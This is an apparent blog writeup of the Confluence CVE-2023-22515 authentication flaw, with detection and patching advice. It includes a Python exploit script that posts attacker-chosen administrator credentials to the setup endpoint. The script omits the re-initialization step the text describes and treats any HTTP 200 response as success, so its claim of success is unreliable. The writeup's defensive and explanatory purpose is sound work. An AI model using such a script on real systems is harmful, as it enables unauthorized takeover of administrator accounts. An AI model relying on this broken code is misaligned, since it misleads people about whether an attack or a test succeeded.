CVE-2023-22515 - How Hackers Gained Access to Confluence Admin Accounts (With Exploit Details)

In October 2023, Atlassian confirmed that attackers had exploited a serious vulnerability in Confluence Data Center and Server. This flaw, tracked as CVE-2023-22515, allowed unauthorized users to create administrator accounts—letting them take control of Confluence instances. While Atlassian Cloud (the atlassian.net hosted version) was safe, any publicly-accessible on-premises or self-hosted Confluence server was at risk. Here’s a clear breakdown of what happened, plus a look at how attackers used this bug.

What Was CVE-2023-22515?

CVE-2023-22515 is a critical improper authentication vulnerability. It affected Confluence Data Center and Confluence Server versions released before the patch. Attackers with network access to the impacted Confluence (i.e., it was exposed to the internet or corporate network) could send crafted requests to create new admin users without needing any prior privileges.

Atlassian published an advisory about it, which you can read here:
- Atlassian Security Advisory 2023-10-04 (CVE-2023-22515)

Safe: Confluence Cloud (accessed via atlassian.net)

If your Confluence site is hosted by Atlassian and you log in at a URL ending in atlassian.net, you’re not vulnerable. But on-prem customers were heavily at risk, especially if their instance was open to the internet for remote access.

The Mechanism

Attackers figured out that sensitive endpoints in Confluence still allowed certain setup actions even after installation was complete. Specifically, they could trigger a re-initialization routine that put the instance back into setup mode and re-enabled the administrative setup API.

With setup mode re-enabled, the attacker could submit the administrator-creation form, typically at the /setup/setupadministrator.action endpoint, which should only be reachable while the instance is in initial setup mode. The resulting account is a full administrator, so the attacker could then simply log in with it.

Example Exploit Code

> NOTE: The following example is for educational and defensive purposes only. Never use unauthorized access against systems you do not own.

Below is a Python code snippet that demonstrates how an attacker could create a new admin user on a vulnerable instance:

```python
import requests

# Change these according to your target and desired credentials
TARGET_URL = "https://vuln-confluence.example.com"
NEW_ADMIN_USER = "eviladmin"
NEW_ADMIN_PASS = "EvilPa$$123!"
EMAIL = "attacker@example.com"

# Setup endpoint that should only be reachable during initial installation
setup_url = f"{TARGET_URL}/setup/setupadministrator.action"

# Form fields of the administrator-creation page
data = {
    "username": NEW_ADMIN_USER,
    "fullName": "Evil Admin",
    "email": EMAIL,
    "password": NEW_ADMIN_PASS,
    "confirm": NEW_ADMIN_PASS,
    "setup-next-button": "Next",
}

session = requests.Session()
resp = session.post(setup_url, data=data, verify=False)

# Crude success check: a "Welcome" page or a 200 response is taken as success
if "Welcome" in resp.text or resp.status_code == 200:
    print(f"[+] Successfully created admin user '{NEW_ADMIN_USER}'")
else:
    print("[-] Failed to create admin user")
```

What this does:
This code attempts to POST to the Confluence setup admin creation endpoint and sets up a new admin user. If successful, the attacker can now access the admin panel.

What to Look For

- Access to /setup/setupadministrator.action outside of the initial install window

You can check user creation times in your application logs and audit logs, and search the application log for hits on the setup endpoint:

```shell
grep 'setupadministrator.action' /opt/atlassian/confluence/logs/atlassian-confluence.log
```
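To make that log check repeatable, here is an added defender-side example (not part of the original post and not Atlassian tooling) that parses Tomcat-style access-log lines and reports every request to a /setup/ endpoint made after the date the instance finished installation. The log lines, IP addresses and install date are constructed for the example; the log format is an assumption to adapt to your own access-log pattern.

```python
import re
from datetime import datetime, timezone

# Constructed sample lines in Tomcat combined access-log format (not real traffic).
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [03/Oct/2023:09:14:02 +0000] "GET /login.action HTTP/1.1" 200 5321
203.0.113.7 - - [03/Oct/2023:09:14:05 +0000] "POST /dologin.action HTTP/1.1" 302 0
198.51.100.23 - - [04/Oct/2023:02:31:11 +0000] "GET /setup/setupadministrator.action HTTP/1.1" 200 8810
198.51.100.23 - - [04/Oct/2023:02:31:19 +0000] "POST /setup/setupadministrator.action?x=1 HTTP/1.1" 302 0
10.0.0.5 - - [04/Oct/2023:08:00:00 +0000] "GET /rest/api/content HTTP/1.1" 200 1200
"""

# Assumed date the instance finished its initial installation (take this from
# your own records); any /setup/ request after this point is suspect.
INSTALL_COMPLETED = datetime(2022, 1, 15, tzinfo=timezone.utc)

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],  # drop any query string
        "status": int(m.group("status")),
    }

def find_setup_hits(log_text, install_completed):
    """Return every request to a /setup/ endpoint made after installation completed."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"].startswith("/setup/") and rec["ts"] > install_completed:
            hits.append(rec)
    return hits

if __name__ == "__main__":
    for h in find_setup_hits(SAMPLE_ACCESS_LOG, INSTALL_COMPLETED):
        print(f"{h['ts'].isoformat()} {h['ip']} {h['method']} {h['path']} -> {h['status']}")
```

A POST to the setup endpoint after install is the strongest signal, since that is the request that actually creates the account; treat any such hit as a trigger for checking the user directory for unexpected administrators.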

Update Immediately:

Upgrade to the latest version as recommended in the Atlassian advisory.

Additional Resources

- Atlassian CVE-2023-22515 Advisory
- NVD - CVE-2023-22515 entry
- Original Hacker Writeup (Security Advisory)
- CERT Coordination Center Advisory

Summary

CVE-2023-22515 is a stark reminder: even mature platforms like Confluence can have overlooked setup paths open to attackers. If you run self-hosted Confluence and haven’t patched recently, update now—and always keep internal tools off the public internet whenever possible.

Stay patched, stay safe!

*If you found this helpful, share it with your IT and security teams to help keep infrastructure secure.*

Timeline

Published on: 10/04/2023 14:15:00 UTC
Last modified on: 10/10/2023 19:22:00 UTC